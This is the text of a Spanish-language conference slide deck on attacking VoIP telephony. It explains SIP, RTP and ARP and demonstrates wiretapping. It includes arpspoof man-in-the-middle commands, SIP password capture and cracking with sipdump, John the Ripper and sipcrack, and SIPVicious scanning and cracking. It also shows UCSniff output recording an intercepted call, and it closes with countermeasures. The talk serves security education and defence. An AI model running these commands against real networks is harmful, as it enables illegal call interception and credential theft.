Embed Size (px)
Citation preview
DISCLAIMER
Todo el contenido de esta charla es resultado de investigación con
fines didácticos y educativos. El autor no se hace responsable por el
uso del conocimiento contenido en la siguiente presentación. La
información contenida debe ser utilizada únicamente para fines éticos
y con la debida autorización.
Todo descubrimiento realizado, ha sido y será usado de forma legal.
La audiencia debe asumir todo lo que se exponga hoy, como “falso” y
“sin fundamento” hasta que lo compruebe personalmente. Limahack
no es el autor directo de ninguno de los descubrimientos expuestos,
ni de las herramientas demostradas, ni los conoce.
Todas las opiniones vertidas durante esta presentación son
exclusivas del expositor, Limahack no es responsable de ninguna de
las opiniones vertidas.
Ing. Nils Alvarez Huamán
Chuponeando
Plataformas de Telefonía IP
Eavesdropping Wiretapping
Menú
• Plataformas de Telefonía IP
• Vectores de ataque a plataformas VoIP
• Descubriendo dispositivos VoIP
• Analizando los Protocolos involucrados
SIP | RTP | ARP
• Huecos de seguridad en las infraestructuras de VoIP
• Demostración y Recomendaciones
Plataformas de
Telefonía IP
Mal diseño de la
Plataforma de
Telefonía IP
Comunicaciones
Unificadas
Las compañías buscan
mayores funcionalidades
Beneficios de la VoIP
Reducción de costos de cableado
VoIP, Data, Video, sobre una misma infraestructura de RED
Reducción de gastos en comunicaciones (LDN y LDI)
Independencia de los Operadores de telefonía
Funcionalidades avanzadas
Fax PDF
Buzón de Voz
Sala de Conferencias
Mensajería Instantánea
¿Y la Seguridad?
Vectores de Ataque a
Plataformas VoIP
Huecos de seguridad en la arquitectura.
Información Gathering, Footprinting and Enumeración
Recuperación de información técnica de los teléfonos IP
VLAN Hopping
Wiretapping
Spoofing Caller ID
Atacking Authentication
Denial of Service / Flooding
Protocolos Involucrados
•SIP Señalización
•RTP Media
•ARP Resolución de Direcciones
Protocolo de Inicio de Sesión
Desarrollado por el IETF / RFC 3261
Estándar para iniciar, modificar y finalizar sesiones interactivas: voz, video, IM, Juegos en línea
Parecido a HTTP y SMTP
Analizando el Protocolo
SIP
User Agent (UA)
UAC: Genera peticiones SIP y recibe respuestas
UAS: Genera respuesta a las peticiones SIP
Ambos se encuentran en todos los agentes de usuario
Servidores SIP
Proxy Server:Retransmiten solicitudes
Register Server: Acepta peticiones de registro
Redirect Server: Genera respuestas de redirección
Componentes de SIP
User Agent Cliente (UAC) User Agent Servidor (UAS)
User Agent Cliente (UAC) Las solicitudes (métodos)
User Agent Servidor (UAS) Las respuestas (código de estado)
Mensajes SIP
Método SIP
REGISTER: Registrar al User Agent.
INVITE: Permite invitar un usuario para participar en una sesión
ACK: Confirma el establecimiento de una sesión.
OPTION: Solicita información sobre las capacidades de un servidor.
BYE: Indica la terminación de una sesión.
CANCEL: Cancela una petición pendiente
Respuestas SIP
1xx - Mensajes provisionales.
2xx - Respuestas de éxito.
3xx - Respuestas de redirección.
4xx - Respuestas de fallo de método.
5xx - Respuestas de fallos de servidor.
6xx - Respuestas de fallos globales.
180 Ring
200 Ok
302 Moved Temp
401 No authenticate
503 Service Unavailable
603 Rechazado
SIP: Proceso de Registro
SIP: Proceso de Registro
SIP utiliza HTTP Digest como mecanismo de autenticación - Sencillo - Eficiente - Inseguro
SIP: Establecer una sesión
Real Time Protocol (RTP)
Es el encargado de transportar audio y video en tiempo real
Utiliza UDP como protocolo de transporte
Hace uso de numero de secuencia, marcas de tiempo, envió de
paquetes sin retransmisión
RTP se integra con el protocolo SIP gracias al protocolo SDP
RTP no esta encriptado por default Entonces podemos hacer wiretapping
ARP
Se utiliza para asociar una capa 3 (capa de red) dirección (tal como una dirección IP)
con una capa 2 (capa de enlace de datos) dirección (dirección MAC).
Para ello se envía un paquete (ARP request) a la dirección de difusión de la red
(broadcast (MAC = FF FF FF FF FF FF)) que contiene la dirección IP por la que se
pregunta, y se espera a que esa máquina (u otra) responda (ARP reply) con la
dirección Ethernet que le corresponde
ARP
ARP
ARP
ARP Spoofing
• Engañar a ambos dispositivos, haciéndoles creer que somos el otro, y luego reenviando los paquetes
Antes de un MitM
Ataque MitM
#arpspoof -i eth0 -t 192.168.1.100 192.168.1.17 #arpspoof -i eth0 -t 192.168.1.17 192.168.1.100
Eavesdropping
• Con un previo ataque Man-In-The-Middle, el atacante consigue ver toda la información
– Señalización
– Flujo de Media
• Se compromete la privacidad del usuario
• Análisis de tráfico
El ataque mas temido e impactante
Capturar y crackear contraseñas SIP
1.- Usando SIPdump empezamos a capturar trafico SIP
#cd /root/hack/SIPcrack-0.3pre/
#./sipdump -i eth0 capturaSIP.pcap
2.- Usamos John The Ripper para aplicar fuerza bruta para descifrar contraseñas.
#cd /root/hack/john-1.7.5/run/
# ./john --incremental=alpha --stdout=4 > /root/hack/SIPcrack-0.3pre/myfifosip
3.- SIP Crack
# cd /root/apps/SIPcrack-0.3pre/
#./ sipcrack -w myfifosip capturaSIP.pcap
EAVESDROPPING
VoIPHopper, Saltarnos la VLAN Voz
ettercap, para hacer ataque arp poisoning
wireshark, para sniffear la red y reconstruir la trama RTP
Técnicas para realizar eavesdropping
#arpspoof -i eth0 -t 192.168.1.100 192.168.1.17
#arpspoof -i eth0 -t 192.168.1.17 192.168.1.100
ARPSpoof + Wireshark = Eavesdropping
Scaneo | Enumeración | crackeo de contraseñas
SIPVicious
Conjunto de herramientas de seguridad en VoIP
Svmap (escaneador SIP)
Svwar (enumerador de extensiones)
Svcrack (crackeador de contraseñas)
Uso:
- svmap.py 192.168.0.0/24
- svwar.py -e1000-1999 192.168.0.100
- svcrack.py -u1001 -d dictionary.txt 192.168.0.100
EAVESDROPPING
Técnicas para realizar eavesdropping
Voice VLAN Discovery and VLAN Hop support ARP Poisoning engine / MitM Automatically links VoIP signaling with RTP media Automatically re-constructs forward and reverse media into single file IP Video Sniffer support
Y tiene que funcionar!!!
DEMO
¿Algún Voluntario?
Voluntario 1
MitM Learning Mode
UCSniff 3.20 starting
Listening on eth0... (Ethernet)
eth0 -> 66:66:66:66:66:66 192.168.0.101 255.255.255.0
Randomizing 255 hosts for scanning...
* |==================================================>| 100.00 %
5 hosts added to the hosts list...
5 hosts saved to arpsaver.txt
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
mitm/ec_arp_poisoning.c:132 - arp_poisoning_start starting arp_poisoner thread
Starting Unified sniffing...
Warning: Please ensure that you hit 'q' when you are finished with this program.
Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS.
ucsniff -i eth0 // //
Wiretapping
Mapped new target entry: (IP: 192.168.0.10) --> extension 1001 and name:
Mapped new target entry: (IP: 192.168.0.19) --> extension 1002 and name:
SIP Call in progress. (extension 1001, ip 192.168.0.10) calling (extension 1002, ip 192.168.0.19)
1001-Calling-1002-23-7-28-1-both.wav
1001-Calling-1002-23-7-28-1-forward.wav
1001-Calling-1002-23-7-28-1.pcap
1001-Calling-1002-23-7-28-1-reverse.wav
arpsaver.txt
calldetail.log
call.log
sipdump.pcap
sip.log
skinny.log
targets.txt
mplayer 1001-Calling-1002-23-7-28-1-both.wav
UCSniff GUI
VoIP Hopping
Acceso no autorizado a una VLAN dentro de una infraestructura de VoIP
RED
Voice VLAN VLAN ID:50
Data VLAN VLAN ID:80
• Voice Vlan pueden ser fáciles de descubrir
Solo tenemos que buscar las información del paquete CDP
Utilizar herramientas de sniffer
VoIPHooper
Buscar información desde el teléfono
Descubriendo dispositivos VoIP Vlan discovery
VoIP Hopper
Es una herramienta para testear la seguridad de una infraestructura de VoIP
Es un protocolo utilizado para comunicar a los teléfonos IP que VLAN ID
necesitan para utilizar en el 802.1Q
Cisco Discovery Protocol
(CDP)
Contramedidas
CONTRAMEDIDAS
• ArpON Securitizar ARP para mitigar ataques de tipo Man In The Middle
• SIP TLS Cifrado de señalización, mecanismo fuerte de autenticaci{on
• SRTP Cifrado, autenticación, Integridad
• VLAN’s Separar la Voz y los datos
• Restricción de acceso Filtrado por MAC, Filtrado por puerto 802.x, QoS
• Desactiva el menú de configuración del teléfono IP
• Desactivar el acceso web en los teléfonos IP
• Sistema IDS/IDP
Nils Alvarez Huamán
@nalvarhu
http://nalvarhu.blogspot.com
GRACIAS!
Referencias
• http://www.securitybydefault.com
• http://saghul.net/blog/
• http://voiphopper.sourceforge.net/
• http://ucsniff.sourceforge.net/
• Todas las imágenes son propiedad de sus respectivos autores.
